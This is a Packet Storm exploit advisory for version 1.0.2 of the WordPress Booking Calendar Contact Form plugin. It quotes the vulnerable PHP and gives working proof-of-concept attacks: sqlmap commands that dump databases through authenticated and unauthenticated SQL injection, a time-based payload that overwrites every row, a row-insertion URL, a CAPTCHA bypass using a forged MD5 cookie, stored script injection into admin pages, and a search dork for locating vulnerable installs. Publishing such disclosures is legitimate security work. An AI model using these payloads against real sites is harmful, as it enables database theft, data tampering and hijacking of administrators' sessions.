what you don't know can hurt you

WordPress Booking Calendar Contact Form 1.0.2 XSS / SQL Injection

WordPress Booking Calendar Contact Form 1.0.2 XSS / SQL Injection
Posted May 13, 2015
Authored by Joaquin Ramirez Martinez

WordPress Booking Calendar Contact Form plugin version 1.0.2 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | f602e3e29e0434b553acff27c0d74ea5

WordPress Booking Calendar Contact Form 1.0.2 XSS / SQL Injection

Change Mirror Download
# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of /wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.

============================================
* Authenticated SQL injection
============================================

========================
Description
========================


In a site that has installed the plugin vulnerable and an attacker who has
an account
editor privileges can exploit the flaw SQL injection and possibly escalate
their privileges.

========================
Vulnerability
========================
vulnerable function code is located in dex_bcf.php


function dex_bccf_load_season_prices() {
global $wpdb;

if ( ! current_user_can('edit_pages') )
{
echo 'No enough privilegies to load this content.';
exit;
}

if (!defined('CP_BCCF_CALENDAR_ID'))
define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);

//.....vulnerable line

$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.CP_BCCF_CALENDAR_ID);
$maxcosts = 0;

...

if (count ($codes))
{
... //Print results [bueno para seleccion mediante UNION]

foreach ($codes as $value)
{
echo '<tr>';
$price = explode(';',$value->price);
echo '<td>'.$price[0].'</td>';
for ($k=1; $k<=$maxcosts; $k++)
echo '<td>'.@$price[$k].'</td>';
echo '<td>'.substr($value->date_from,0,10).'</td>';
echo '<td>'.substr($value->date_to,0,10).'</td>';
echo '<td>[<a
href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>';
echo '</tr>';
}

...
}

======================
Injection
======================
the following urls can be used to inject code.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1

------------------------
GET parameter vulnerable
------------------------
dex_item

========================
injection techniques:
========================

-> UNION BASED
-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
"
-p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE"
--dbms="mysql" --dbs

====================================================


=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_delete($ret) {
global $wpdb;
$wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete

------------------------
POST parameter vulnerable
------------------------
id

========================
injection techniques:
========================

-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
"
--data="id=1" -p id --level=5 --risk=3
--cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T



====================================================
* Authenticated SQL injection
====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_update($ret) {
global $wpdb;

dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");

$wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit

------------------------
POST parameter vulnerable
------------------------
id

========================
injection techniques:
========================

-> BLIND

=======================
POC
=======================
(modifing all rows with "i0akiN" value and sleeping 5 seconds)

url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN


=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_add($ret) {
global $wpdb;

$calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
...

$wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
"
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
.esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
..

}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]

========================
injection techniques:
========================

-> Insertion data

=======================
POC
=======================

Insert a row into wp_bccf_reservation_calendars_data table without use
other post parameters

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&
id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -




====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================

An attacker without autorization can send modified requests to database and
sensitive information
that can use for escalate privilegies and more...

======================
Vulnerability
======================
vulnerable function code is located in dex_bcf.php


function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...

//$calendar is not sanitized in sql query

$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
$mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
while (
(($enddate>$startday) && !$mode) ||
(($enddate>=$startday) && $mode)
)
{
$daily_price = $default_price;
$sprice = array();
foreach ($codes as $value)
{
$sfrom = strtotime($value->date_from);
$sto = strtotime($value->date_to);
if ($startday >= $sfrom && $startday <= $sto)
{
$sprice = explode (';', $value->price);
$daily_price = $sprice[0];
}
}
$season_prices[] = $sprice;
$price += $daily_price;
$startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
$days++;
}

...
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost

------------------------
post variable vulnerable
------------------------
dex_item=1

========================
injection techniques:
========================

-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND

========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.

python sqlmap.py --url="
http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost
"
--data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs
--tecnique U

===========================================================

============================================================
* Unauthenticated SQL injection 2
============================================================

========================
Description
========================

The following function is also vulnerable to SQL injection because usually
the variable
CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET
['dex_item'] Besides this function is used in several places
the code.

========================
Vulnerability
========================
Vulnerable function:

function dex_bccf_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if (!defined("CP_BCCF_CALENDAR_ID"))
return $default_value;
if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
$value = @$dex_option_buffered_item->$field;
else
{
//....vulnerable line

$myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
$value = @$myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_BCCF_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}




##########################################

======================================
* CAPTCHA BYPASS & ROW INSERTION
======================================

==============
DESCRIPTION
==============

An attacker can manipulate some variables for bypass conditional staments.
For example: insert unlimited rows into
table (could use a program)

=============
... HOW?
=============

An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5
encryption saving into value of
"rand_code" cookie.

==========
POC
==========

REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&
dex_item=1&
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&
hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
^
-------------- |
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1

-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted

===========================
VULNERABLE FUNCTION CODE
==========================


function dex_bccf_check_posted_data(){
....

if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
if (
(dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
($_SESSION['rand_code'] == '')
)
&&
( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
($_COOKIE['rand_code'] == '')
)
)
{
$_SESSION['rand_code'] = '';
echo 'captchafailed';
exit;
}

// if this isn't the real post (it was the captcha verification) then echo
ok and exit
if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
echo 'ok';
exit;
}
...

}


###########################################

=======================================
* Persistent JS/HTML code injection
=======================================

========================
Description:
========================
Un atacante sin autenticacion puede inyectar codigo malicioso que podria
ejecutar el navegador
de la victima(could be an administrator). Cuando la victima visite la
pagina modificada, el atacante
podria robar datos y/o controlar las acciones de la victima de forma remota.

========================
Vulnerability
========================

http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data

POST-DATA

dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E


Parameters email_confirmation_to_user,email_notification_to_admin not
filtered and is included in admin page

====================
VULNERABLE FUNCTION
====================

dex_bccf_save_options() located in dex_bccf.php

save unfiltered post data



#########################################

Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close